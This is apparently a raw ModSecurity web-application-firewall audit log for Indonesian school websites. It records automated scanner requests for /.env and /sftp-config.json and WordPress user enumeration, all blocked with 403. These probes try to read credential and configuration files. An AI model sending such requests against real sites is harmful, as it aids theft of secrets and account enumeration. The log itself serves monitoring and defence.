Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --219c1457-Z-- --422e2c2a-A-- [07/May/2025:19:36:43 +0700] aBtT223ZWOH0zu5xiSSnKwAAANQ 103.236.140.4 39292 103.236.140.4 8181 --422e2c2a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.179.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.179.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --422e2c2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --422e2c2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746621403775881 863 (- - -) Stopwatch2: 1746621403775881 863; combined=363, p1=320, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --422e2c2a-Z-- --faef2902-A-- [07/May/2025:20:00:43 +0700] aBtZe12wLCWKKTe5QCHRrgAAAFM 103.236.140.4 41426 103.236.140.4 8181 --faef2902-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.50.220.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.50.220.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --faef2902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faef2902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746622843307643 2953 (- - -) Stopwatch2: 1746622843307643 2953; combined=1302, p1=458, p2=814, p3=0, p4=0, p5=30, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faef2902-Z-- --8dae0b58-A-- [07/May/2025:20:08:30 +0700] aBtbTkkjCPYF0_E6F_Iz7QAAAI8 103.236.140.4 45472 103.236.140.4 8181 --8dae0b58-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.151.206.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.151.206.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8dae0b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dae0b58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746623310178730 2506 (- - -) Stopwatch2: 1746623310178730 2506; combined=1189, p1=374, p2=787, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dae0b58-Z-- --a4ae905a-A-- [07/May/2025:21:03:27 +0700] aBtoL4yiPdJj1JUH57qMAAAAAAI 103.236.140.4 45856 103.236.140.4 8181 --a4ae905a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 82.165.249.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.249.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a4ae905a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4ae905a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746626607043223 2546 (- - -) Stopwatch2: 1746626607043223 2546; combined=1314, p1=448, p2=833, p3=0, p4=0, p5=33, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4ae905a-Z-- --b13a1d7c-A-- [07/May/2025:21:08:57 +0700] aBtpeYyiPdJj1JUH57qMBQAAAA8 103.236.140.4 45898 103.236.140.4 8181 --b13a1d7c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.143.101.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.143.101.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b13a1d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b13a1d7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746626937161208 2846 (- - -) Stopwatch2: 1746626937161208 2846; combined=1228, p1=417, p2=782, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b13a1d7c-Z-- --c1278924-A-- [07/May/2025:21:28:40 +0700] aBtuGF2wLCWKKTe5QCHTEAAAAEc 103.236.140.4 46042 103.236.140.4 8181 --c1278924-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.212.139.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.212.139.224 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1278924-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1278924-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746628120846192 2835 (- - -) Stopwatch2: 1746628120846192 2835; combined=1232, p1=422, p2=780, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1278924-Z-- --7060aa75-A-- [07/May/2025:21:51:36 +0700] aBtzeF2wLCWKKTe5QCHTIQAAAEo 103.236.140.4 46158 103.236.140.4 8181 --7060aa75-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) Accept-Charset: utf-8 --7060aa75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7060aa75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746629496104460 883 (- - -) Stopwatch2: 1746629496104460 883; combined=365, p1=320, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7060aa75-Z-- --e6c72578-A-- [07/May/2025:21:55:38 +0700] aBt0am3ZWOH0zu5xiSSo4QAAANM 103.236.140.4 46198 103.236.140.4 8181 --e6c72578-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.79.176.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.79.176.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6c72578-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6c72578-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746629738190778 2510 (- - -) Stopwatch2: 1746629738190778 2510; combined=1130, p1=354, p2=740, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6c72578-Z-- --688de409-A-- [07/May/2025:22:29:37 +0700] aBt8YUkjCPYF0_E6F_I33QAAAJc 103.236.140.4 35518 103.236.140.4 8181 --688de409-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.155.185 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.155.185 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --688de409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --688de409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746631777795309 892 (- - -) Stopwatch2: 1746631777795309 892; combined=366, p1=321, p2=0, p3=0, p4=0, p5=45, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --688de409-Z-- --d49ae25f-A-- [07/May/2025:23:22:08 +0700] aBuIsEkjCPYF0_E6F_I38wAAAIQ 103.236.140.4 35786 103.236.140.4 8181 --d49ae25f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonT68/R201A Accept-Charset: utf-8 --d49ae25f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d49ae25f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746634928807644 851 (- - -) Stopwatch2: 1746634928807644 851; combined=340, p1=295, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d49ae25f-Z-- --17361577-A-- [07/May/2025:23:51:39 +0700] aBuPm12wLCWKKTe5QCHb7QAAAEA 103.236.140.4 53884 103.236.140.4 8181 --17361577-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.231.89.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.231.89.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17361577-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17361577-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746636699330844 2740 (- - -) Stopwatch2: 1746636699330844 2740; combined=1385, p1=466, p2=889, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17361577-Z-- --fd14e853-A-- [08/May/2025:00:04:28 +0700] aBuSnIyiPdJj1JUH57qdLwAAAAk 103.236.140.4 55046 103.236.140.4 8181 --fd14e853-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.46.159.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.46.159.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fd14e853-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd14e853-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746637468719212 2273 (- - -) Stopwatch2: 1746637468719212 2273; combined=1321, p1=406, p2=884, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd14e853-Z-- --3318e320-A-- [08/May/2025:00:19:58 +0700] aBuWPoyiPdJj1JUH57qm-QAAABM 103.236.140.4 60762 103.236.140.4 8181 --3318e320-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.83.170.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.83.170.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3318e320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3318e320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746638398113480 3167 (- - -) Stopwatch2: 1746638398113480 3167; combined=2032, p1=582, p2=1422, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3318e320-Z-- --3a052c6c-A-- [08/May/2025:01:24:15 +0700] aBulT23ZWOH0zu5xiSTv-QAAANU 103.236.140.4 34636 103.236.140.4 8181 --3a052c6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --3a052c6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a052c6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746642255600217 804 (- - -) Stopwatch2: 1746642255600217 804; combined=349, p1=310, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a052c6c-Z-- --52f7b861-A-- [08/May/2025:01:57:00 +0700] aBus_G3ZWOH0zu5xiSTzagAAAMY 103.236.140.4 48680 103.236.140.4 8181 --52f7b861-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.234.48.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.234.48.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52f7b861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52f7b861-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746644220928140 3351 (- - -) Stopwatch2: 1746644220928140 3351; combined=1372, p1=476, p2=864, p3=0, p4=0, p5=31, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52f7b861-Z-- --4b522552-A-- [08/May/2025:02:01:37 +0700] aBuuEV2wLCWKKTe5QCEgGAAAAEM 103.236.140.4 48722 103.236.140.4 8181 --4b522552-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 13.38.12.190 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* Cookie: X-Forwarded-For: 13.38.12.190 Accept-Encoding: gzip X-Varnish: 143964719 --4b522552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b522552-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746644497296939 960 (- - -) Stopwatch2: 1746644497296939 960; combined=389, p1=343, p2=0, p3=0, p4=0, p5=46, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b522552-Z-- --fa29d866-A-- [08/May/2025:02:43:16 +0700] aBu31IyiPdJj1JUH57rbgwAAABA 103.236.140.4 57140 103.236.140.4 8181 --fa29d866-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 929) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537 Accept-Charset: utf-8 --fa29d866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa29d866-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746646996784350 906 (- - -) Stopwatch2: 1746646996784350 906; combined=396, p1=354, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa29d866-Z-- --98879d42-A-- [08/May/2025:03:09:15 +0700] aBu9612wLCWKKTe5QCEiuwAAAFY 103.236.140.4 60520 103.236.140.4 8181 --98879d42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.58.16.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.58.16.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --98879d42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98879d42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity 